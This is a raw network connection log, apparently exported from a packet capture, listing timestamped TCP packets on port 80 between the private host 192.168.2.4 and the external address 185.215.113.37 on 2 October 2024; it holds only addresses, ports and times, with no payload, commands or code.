Oct 2, 2024 18:19:30.565200090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565256119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565258026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565270901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565293074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565295935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565308094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565324068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565336943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565372944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.565438986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.565756083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.624685049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624720097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624736071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624757051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.624804020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.624829054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624844074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624859095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624872923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624888897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624897957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.624902010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624923944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.624958038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.624968052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624983072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.624998093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625024080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625072002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625072956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625087976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625103951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625119925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625128031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625134945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625138044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625149012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625164986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625168085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625180006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625206947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625209093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625219107 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625226021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625238895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625247955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625283003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625340939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625356913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625371933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625386953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625395060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625402927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625420094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625457048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625463009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625473976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625502110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625520945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625534058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625546932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625547886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625583887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625632048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625649929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625665903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625678062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625679970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625694036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.625730991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.625763893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.655734062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.655793905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.655802011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.655810118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.655838966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.655843973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.655855894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.655864000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.655873060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.655889034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.655915976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.655999899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656014919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656029940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656044006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656049967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656059027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656080961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656090021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656096935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656111002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656126976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656162024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656183958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656198978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656217098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656229019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656230927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656246901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656274080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656286955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656301975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656316042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656317949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656337023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656382084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656409979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656425953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656440020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656476974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656497955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656502962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656553984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656738043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656754017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656768084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656790972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656804085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656820059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656836033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656841993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656855106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656879902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656893969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656898022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656917095 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656928062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656932116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656946898 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656946898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656961918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656976938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.656984091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.656991959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657006025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657028913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657031059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657046080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657051086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657068968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657083035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657089949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657098055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657113075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657119989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657128096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657143116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657150030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657170057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657172918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657210112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657228947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657357931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657371998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657387018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657407999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657407045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657428026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657442093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657458067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657471895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657480001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657486916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657501936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657505035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657519102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657532930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657537937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657546997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657567024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657572031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657598972 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657625914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657707930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657723904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657753944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657762051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657768011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657774925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657783031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657803059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657812119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657819986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657828093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657835960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657838106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657849073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657856941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657865047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657941103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657957077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.657965899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657988071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.657995939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.658041954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717381001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717415094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717431068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717447042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717462063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717478991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717494965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717499971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717573881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717608929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717632055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717648029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717660904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717663050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717679977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717690945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717717886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717732906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717734098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717749119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717761993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717762947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717777014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717797041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717803955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717838049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717844963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717853069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717866898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717881918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717885971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717895985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717916965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717927933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.717959881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717991114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.717993975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718009949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718024969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718038082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718041897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.718110085 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718111038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.718111038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.718206882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718221903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718236923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718250990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718257904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.718265057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718278885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718293905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718300104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.718308926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.718333960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.718364000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.749919891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.749937057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.749953032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.749998093 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750015020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750035048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750053883 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750077963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750092983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750101089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750160933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750195026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750210047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750217915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750233889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750242949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750250101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750274897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750309944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750365019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750380993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750423908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750648975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750663996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750679016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750710964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750736952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750737906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750752926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750767946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750788927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750803947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750858068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750888109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750902891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750917912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750932932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750945091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750948906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.750973940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.750992060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751055956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751071930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751086950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751112938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751161098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751323938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751374960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751379967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751410007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751430035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751456022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751470089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751478910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751492977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751521111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751568079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751624107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751637936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751652956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751667976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751682043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751688004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751699924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751713991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751715899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751738071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751738071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751751900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751779079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751794100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751807928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751822948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751841068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751856089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751878023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751878977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751893997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751909018 CEST	49737	80	192.168.2.4	185.215.113.37
